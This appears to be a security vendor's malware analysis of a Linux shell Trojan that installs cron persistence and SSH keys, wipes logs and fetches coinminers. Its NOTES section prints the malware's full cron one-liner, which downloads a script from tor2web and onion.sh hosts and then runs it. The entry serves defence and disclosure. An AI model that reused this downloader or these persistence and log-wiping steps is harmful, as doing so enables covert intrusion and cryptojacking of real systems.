Analysis by: John Anthony Banes
ALIASES:

Trojan-Downloader.Linux.Sh (Ikarus); Linux/TrojanDownloader.SH.GA (NOD32)

 PLATFORM:

Linux

 OVERALL RISK RATING:
 DAMAGE POTENTIAL:
 DISTRIBUTION POTENTIAL:
 REPORTED INFECTION:
 INFORMATION EXPOSURE:

  • Threat Type: Trojan

  • Destructiveness: No

  • Encrypted: No

  • In the wild: Yes

  OVERVIEW

Infection Channel: Downloaded from the Internet, Dropped by other malware

This Trojan arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.

It connects to certain websites to send and receive information.

  TECHNICAL DETAILS

File Size: 35,177 bytes
File Type: Other
Memory Resident: Yes
Initial Samples Received Date: 19 Jun 2019
Payload: Connects to URLs/IPs, Steals information

Arrival Details

This Trojan arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.

This malware arrives via the following means:

Installation

This Trojan drops the following files:

  • cron tasks:
    • /etc/crontab
    • /etc/crontabs/root
    • /var/spool/cron/crontabs/root
    • /var/spool/cron/root
    • /etc/cron.d/root
    • /etc/cron.d/.cronbus
  • /root/.ssh/authorized_keys OR /home/{user}/.ssh/authorized_keys - used for logging in as user@localhost
  • /root/.cache/.a - file marker for uninstall routines

Other System Modifications

This Trojan modifies the following file(s):

  • /etc/rc.local - adds "sh /usr/local/bin/npt" to run downloaded file on boot
  • /var/spool/mail/{user} - contents replaced with "0" string
  • /var/log/wtmp - contents replaced with "0" string
  • /var/log/secure - contents replaced with "0" string
  • /var/log/cron - contents replaced with "0" string

It deletes the following files:

  • /etc/ld.so.preload*
  • /etc/systemd/system/cloud*
  • files in /var/tmp
  • files in /var/spool/cron/crontabs
  • files in /var/spool/cron
  • files in /etc/cron.d
  • files in /etc/crontabs

Process Termination

This Trojan terminates processes or services that contain any of the following strings if found running in the affected system's memory:

  • Cloud-related Services:
    • barad_agent*
    • anat*
    • aliyun-service
    • yunjing
  • Other Processes (some are related to malware/coinmining):
    • .kthreadd
    • .over
    • .sr0
    • .sshd
    • /60009
    • /tmp/
    • /tmp/init
    • 44444
    • 56416
    • clay
    • clean.sh
    • config.json
    • cpuminer
    • cranberry
    • crawler.weibo
    • cryptonight
    • ddgs
    • ebscan
    • geqn
    • gpg-daemon
    • gwjyhs.com
    • hashrate
    • hashvault
    • httpdz
    • jobs.flu.cc
    • kerbero
    • kerberods
    • khugepageds
    • killTop.sh
    • krun.sh
    • kworker
    • kworkerds
    • Linux
    • linuxl
    • linuxs
    • minerd
    • mrx1
    • nicehash
    • nmap
    • pastebin.com
    • redis-cli
    • redisscan
    • slave
    • sobot.com
    • ssh_deny.sh
    • start.sh
    • stratum
    • udevs
    • watch.sh
    • xig
    • xmr
  • Exceptions:
    • If Process ID is less than 301
    • Process belongs to the malware itself
    • If Process ID = Parent PID

Download Routine

This Trojan connects to the following website(s) to download and execute a malicious file:

  • https://{BLOCKED}2wp4xo7hpr{URL String}/images/{a|r}{32|64}x75 - uncompressed coinminer executable
  • https://{BLOCKED}2wp4xo7hpr{URL String}/images/ico/{a|r}{32|64}x75.ico - compressed coinminer executable
  • https://{BLOCKED}2wp4xo7hpr{URL String}/src/main - updated copy of itself, base64 encoded
  • https://{BLOCKED}2wp4xo7hpr{URL String}/src/wd
  • https://{BLOCKED}2wp4xo7hpr{URL String}/src/ldm - executed every 30 minutes
  • https://{BLOCKED}2wp4xo7hpr{URL String}/src/sc - python script for scanning networks

It saves the files it downloads using the following names:

  • /root/.cache/.editorinfo OR /home/{user}/.cache/.editorinfo
  • /usr/local/bin/nptd
  • /etc/cron.hourly/cronlog
  • /etc/cron.daily/cronlog
  • /etc/cron.monthly/cronlog
  • /root/.cache/favicon.ico OR /home/{user}/.cache/favicon.ico - coinminer
  • /root/.cache/.kswapd OR /home/{user}/.cache/.kswapd - coinminer
  • /root/.cache/[kthrotlds] OR /home/{user}/[kthrotlds] - coinminer
  • /usr/bin/[kthrotlds] - coinminer
  • /root/.cache/.ntp OR /home/{user}/.cache/.ntp

Other Details

This Trojan connects to the following website to send and receive information:

  • https://{BLOCKED}2wp4xo7hpr{URL String}/src/ud - update flag

It does the following:

  • Enables and modifies hugepages by setting "vm.nr_hugepages=128"
  • If "cron" or "wget" is not installed, "echo" is used instead to avoid errors.
  • Modifies /etc/hosts file with contents "127.0.0.1 localhost" if one of the strings below are present in the hosts file:
    • onion.
    • timesync.su
    • tor2web
  • Installs the following components if not present in the system:
    • net-tools (installed using yum, apt-get, pacman or apk)
  • Uninstalls the following components below if found running in the system:
    • aliyun
    • yunjing

NOTES:
It adds the following entry on cron:

  • */{number} * * * * tbin=$(command -v passwd); bpath=$(dirname "${tbin}"); curl="curl"; if [ $(curl --version 2>/dev/null|grep "curl "|wc -l) -eq 0 ]; then curl="echo"; if [ "${bpath}" != "" ]; then for f in ${bpath}*; do strings $f 2>/dev/null|grep -q "CURLOPT_VERBOSE" && curl="$f" && break; done; fi; fi; wget="wget"; if [ $(wget --version 2>/dev/null|grep "wgetrc "|wc -l) -eq 0 ]; then wget="echo"; if [ "${bpath}" != "" ]; then for f in ${bpath}*; do strings $f 2>/dev/null|grep -q "to " && wget="$f" && break; done; fi; fi; if [ $(cat /etc/hosts|grep -i "onion.\|timesync.su\|tor2web"|wc -l) -ne 0 ]; then echo "127.0.0.1 localhost" > /etc/hosts >/dev/null 2>&1; fi; (${curl} -fsSLk --connect-timeout 26 --max-time 75 https://an7kmd2wp4xo7hpr.tor2web.su/src/ldm -o {/usr/local/bin/npt | /root/.cache/.ntp | /home/{user}/.cache/.ntp}||${curl} -fsSLk --connect-timeout 26 --max-time 75 https://an7kmd2wp4xo7hpr.d2web.org/src/ldm -o {/usr/local/bin/npt | /root/.cache/.ntp | /home/{user}/.cache/.ntp}||${curl} -fsSLk --connect-timeout 26 --max-time 75 https://an7kmd2wp4xo7hpr.onion.sh/src/ldm -o {/usr/local/bin/npt | /root/.cache/.ntp | /home/{user}/.cache/.ntp}||${wget} --quiet --no-check-certificate --connect-timeout=26 --timeout=75 https://an7kmd2wp4xo7hpr.tor2web.su/src/ldm -O {/usr/local/bin/npt | /root/.cache/.ntp | /home/{user}/.cache/.ntp}||${wget} --quiet --no-check-certificate --connect-timeout=26 --timeout=75 https://an7kmd2wp4xo7hpr.d2web.org/src/ldm -O {/usr/local/bin/npt | /root/.cache/.ntp | /home/{user}/.cache/.ntp}||${wget} --quiet --no-check-certificate --connect-timeout=26 --timeout=75 https://an7kmd2wp4xo7hpr.onion.sh/src/ldm -O {/usr/local/bin/npt | /root/.cache/.ntp | /home/{user}/.cache/.ntp}) && chmod +x {/usr/local/bin/npt | /root/.cache/.ntp | /home/{user}/.cache/.ntp} && /sbin/sh {/usr/local/bin/npt | /root/.cache/.ntp | /home/{user}/.cache/.ntp} ##
    • {URL String} consists of the following values:
      • .tor2web.su
      • .tor2web.io
      • .onion.sh
    • For the coinminer file, {a|r}{32|64}x75:
      • a = Alpine Linux distribution or if /sbin/apk exists
      • r = other Linux distributions
      • 32 = 32-bit version
      • 64 = 64-bit version

  SOLUTION

Minimum Scan Engine: 9.850
FIRST VSAPI PATTERN FILE: 15.182.06
FIRST VSAPI PATTERN DATE: 18 Jun 2019
VSAPI OPR PATTERN File: 15.183.00
VSAPI OPR PATTERN Date: 19 Jun 2019

Scan your computer with your Trend Micro product to delete files detected as Trojan.SH.MIXBASH.A. If the detected files have already been cleaned, deleted, or quarantined by your Trend Micro product, no further step is required. You may opt to simply delete the quarantined files. Please check the following Trend Micro Support pages for more information:


Did this description help? Tell us how we did.